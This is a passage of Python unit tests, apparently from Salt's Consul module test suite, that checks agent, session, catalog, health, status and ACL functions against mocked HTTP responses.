with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Check {} marked as passing."
result = consul.agent_check_pass(consul_url=consul_url, checkid=checkid)
expected = {"message": msg.format(checkid), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to update check {}."
result = consul.agent_check_pass(consul_url=consul_url, checkid=checkid)
expected = {"message": msg.format(checkid), "res": False}
assert expected == result
def test_agent_check_warn():
"""
Test consul agent check warn
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_check_register(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
checkid = "id1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.agent_check_warn,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Check {} marked as warning."
result = consul.agent_check_warn(consul_url=consul_url, checkid=checkid)
expected = {"message": msg.format(checkid), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to update check {}."
result = consul.agent_check_warn(consul_url=consul_url, checkid=checkid)
expected = {"message": msg.format(checkid), "res": False}
assert expected == result
def test_agent_check_fail():
"""
Test consul agent check warn
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_check_register(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
checkid = "id1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.agent_check_fail,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Check {} marked as critical."
result = consul.agent_check_fail(consul_url=consul_url, checkid=checkid)
expected = {"message": msg.format(checkid), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to update check {}."
result = consul.agent_check_fail(consul_url=consul_url, checkid=checkid)
expected = {"message": msg.format(checkid), "res": False}
assert expected == result
def test_agent_service_register():
"""
Test consul agent service register
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_service_register(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
name = "name1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.agent_service_register,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Service {} registered on agent."
result = consul.agent_service_register(
consul_url=consul_url,
name=name,
script="test",
http="test",
ttl="test",
interval="test",
)
expected = {"message": msg.format(name), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to register service {}."
result = consul.agent_service_register(
consul_url=consul_url,
name=name,
script="test",
http="test",
ttl="test",
interval="test",
)
expected = {"message": msg.format(name), "res": False}
assert expected == result
def test_agent_service_deregister():
"""
Test consul agent service deregister
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_service_deregister(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
serviceid = "sid1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.agent_service_deregister,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Service {} removed from agent."
result = consul.agent_service_deregister(
consul_url=consul_url, serviceid=serviceid
)
expected = {"message": msg.format(serviceid), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to remove service {}."
result = consul.agent_service_deregister(
consul_url=consul_url, serviceid=serviceid
)
expected = {"message": msg.format(serviceid), "res": False}
assert expected == result
def test_agent_service_maintenance():
"""
Test consul agent service maintenance
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_service_maintenance(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
serviceid = "sid1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.agent_service_maintenance,
consul_url=consul_url,
)
# missing enable
msg = 'Required parameter "enable" is missing.'
result = consul.agent_service_maintenance(
consul_url=consul_url, serviceid=serviceid
)
expected = {"message": msg, "res": False}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Service {} set in maintenance mode."
result = consul.agent_service_maintenance(
consul_url=consul_url, serviceid=serviceid, enable=True
)
expected = {"message": msg.format(serviceid), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to set service {} to maintenance mode."
result = consul.agent_service_maintenance(
consul_url=consul_url, serviceid=serviceid, enable=True
)
expected = {"message": msg.format(serviceid), "res": False}
assert expected == result
def test_session_create():
"""
Test consul session create
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.session_create(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
name = "name1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.session_create,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Created session {}."
result = consul.session_create(consul_url=consul_url, name=name)
expected = {"message": msg.format(name), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to create session {}."
result = consul.session_create(consul_url=consul_url, name=name)
expected = {"message": msg.format(name), "res": False}
assert expected == result
def test_session_list():
"""
Test consul session list
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.session_list(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.session_list(consul_url=consul_url)
expected = {"data": "test", "res": True}
assert expected == result
def test_session_destroy():
"""
Test consul session destroy
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
session = "sid1"
name = "test"
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.session_destroy(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
pytest.raises(
SaltInvocationError,
consul.session_destroy,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
msg = "Destroyed Session {}."
result = consul.session_destroy(
consul_url=consul_url, session=session, name="test"
)
expected = {"message": msg.format(session), "res": True}
assert expected == result
def test_session_info():
"""
Test consul session info
"""
consul_url = "http://localhost:1313"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
session = "sid1"
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.session_info(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
pytest.raises(
SaltInvocationError,
consul.session_info,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.session_info(consul_url=consul_url, session=session)
expected = {"data": "test", "res": True}
assert expected == result
def test_catalog_register():
"""
Test consul catalog register
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
node = "node1"
address = "addres1"
nodemeta = {
"Cpu": "blah",
"Cpu_num": "8",
"Memory": "1024",
"Os": "rhel8",
"Osarch": "x86_64",
"Kernel": "foo.bar",
"Kernelrelease": "foo.release",
"localhost": "localhost",
"nodename": node,
"os_family": "adams",
"lsb_distrib_description": "distro",
"master": "master",
}
nodemeta_kwargs = {
"cpu": "blah",
"num_cpus": "8",
"mem": "1024",
"oscode": "rhel8",
"osarch": "x86_64",
"kernel": "foo.bar",
"kernelrelease": "foo.release",
"localhost": "localhost",
"nodename": node,
"os_family": "adams",
"lsb_distrib_description": "distro",
"master": "master",
}
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.catalog_register(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.catalog_register(consul_url=consul_url, token=token)
expected = {
"message": "Required argument node argument is missing.",
"res": False,
}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.catalog_register(
consul_url=consul_url,
token=token,
node=node,
address=address,
**nodemeta_kwargs
)
expected = {
"data": {"Address": address, "Node": node, "NodeMeta": nodemeta},
"message": "Catalog registration for {} successful.".format(node),
"res": True,
}
assert expected == result
def test_catalog_deregister():
"""
Test consul catalog deregister
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
node = "node1"
address = "addres1"
serviceid = "server1"
checkid = "check1"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.catalog_deregister(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.catalog_deregister(consul_url=consul_url, token=token)
expected = {"message": "Node argument required.", "res": False}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.catalog_deregister(
consul_url=consul_url,
token=token,
node=node,
serviceid=serviceid,
checkid=checkid,
)
expected = {
"message": "Catalog item {} removed.".format(node),
"res": True,
}
assert expected == result
def test_catalog_datacenters():
"""
Test consul catalog datacenters
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.catalog_datacenters(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.catalog_datacenters(consul_url=consul_url, token=token)
expected = {"data": "test", "res": True}
assert expected == result
def test_catalog_nodes():
"""
Test consul catalog nodes
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.catalog_nodes(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.catalog_nodes(consul_url=consul_url, token=token)
expected = {"data": "test", "res": True}
assert expected == result
def test_catalog_services():
"""
Test consul catalog services
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.catalog_services(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.catalog_services(consul_url=consul_url, token=token)
expected = {"data": "test", "res": True}
assert expected == result
def test_catalog_service():
"""
Test consul catalog service
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
service = "service"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.catalog_service(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
pytest.raises(
SaltInvocationError,
consul.catalog_service,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.catalog_service(
consul_url=consul_url, token=token, service=service
)
expected = {"data": "test", "res": True}
assert expected == result
def test_catalog_node():
"""
Test consul catalog node
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
node = "node"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.catalog_node(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
pytest.raises(
SaltInvocationError,
consul.catalog_node,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.catalog_node(consul_url=consul_url, token=token, node=node)
expected = {"data": "test", "res": True}
assert expected == result
def test_health_node():
"""
Test consul health node
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
node = "node"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.health_node(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
pytest.raises(
SaltInvocationError,
consul.health_node,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.health_node(consul_url=consul_url, token=token, node=node)
expected = {"data": "test", "res": True}
assert expected == result
def test_health_checks():
"""
Test consul health checks
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
service = "service"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.health_checks(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
pytest.raises(
SaltInvocationError,
consul.health_checks,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.health_checks(
consul_url=consul_url, token=token, service=service
)
expected = {"data": "test", "res": True}
assert expected == result
def test_health_service():
"""
Test consul health service
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
service = "service"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.health_service(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
pytest.raises(
SaltInvocationError,
consul.health_service,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.health_service(
consul_url=consul_url, token=token, service=service
)
expected = {"data": "test", "res": True}
assert expected == result
def test_health_state():
"""
Test consul health state
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
state = "state"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.health_state(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
pytest.raises(
SaltInvocationError,
consul.health_state,
consul_url=consul_url,
)
# state not in allowed states
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.health_state(
consul_url=consul_url, token=token, state=state
)
expected = {
"message": "State must be any, unknown, passing, warning, or critical.",
"res": False,
}
assert expected == result
state = "warning"
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.health_state(
consul_url=consul_url, token=token, state=state
)
expected = {"data": "test", "res": True}
assert expected == result
def test_status_leader():
"""
Test consul status leader
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.status_leader(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.status_leader(consul_url=consul_url, token=token)
expected = {"data": "test", "res": True}
assert expected == result
def test_status_peers():
"""
Test consul status peers
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.status_peers(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.status_peers(consul_url=consul_url, token=token)
expected = {"data": "test", "res": True}
assert expected == result
def test_acl_create():
"""
Test consul acl create
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
name = "name1"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.acl_create(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
pytest.raises(
SaltInvocationError,
consul.acl_create,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.acl_create(consul_url=consul_url, token=token, name=name)
expected = {"message": "ACL {} created.".format(name), "res": True}
assert expected == result
def test_acl_update():
"""
Test consul acl update
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
name = "name1"
aclid = "id1"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.acl_update(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.acl_update(consul_url=consul_url)
expected = {
"message": 'Required parameter "id" is missing.',
"res": False,
}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
pytest.raises(
SaltInvocationError,
consul.acl_update,
consul_url=consul_url,
id=aclid,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.acl_update(
consul_url=consul_url, token=token, name=name, id=aclid
)
expected = {"message": "ACL {} created.".format(name), "res": True}
assert expected == result
def test_acl_delete():
"""
Test consul acl delete
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
name = "name1"
aclid = "id1"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.acl_delete(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.acl_delete(consul_url=consul_url)
expected = {
"message": 'Required parameter "id" is missing.',
"res": False,
}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.acl_delete(
consul_url=consul_url, token=token, name=name, id=aclid
)
expected = {"message": "ACL {} deleted.".format(aclid), "res": True}
assert expected == result
def test_acl_info():
"""
Test consul acl info
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
name = "name1"
aclid = "id1"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.acl_info(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.acl_info(consul_url=consul_url)
expected = {
"message": 'Required parameter "id" is missing.',
"res": False,
}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.acl_info(
consul_url=consul_url, token=token, name=name, id=aclid
)
expected = {"data": "test", "res": True}
assert expected == result
def test_acl_clone():
"""
Test consul acl clone
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
name = "name1"
aclid = "id1"
mock_result = aclid
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.acl_clone(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.acl_clone(consul_url=consul_url)
expected = {
"message": 'Required parameter "id" is missing.',
"res": False,
}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.acl_clone(
consul_url=consul_url, token=token, name=name, id=aclid
)
expected = {
"ID": aclid,
"message": "ACL {} cloned.".format(name),
"res": True,
}
assert expected == result
def test_acl_list():
"""
Test consul acl list
"""
consul_url = "http://localhost:1313"
token = "randomtoken"
name = "name1"
aclid = "id1"
mock_result = aclid
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
result = consul.acl_list(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
result = consul.acl_list(
consul_url=consul_url, token=token, name=name, id=aclid
)
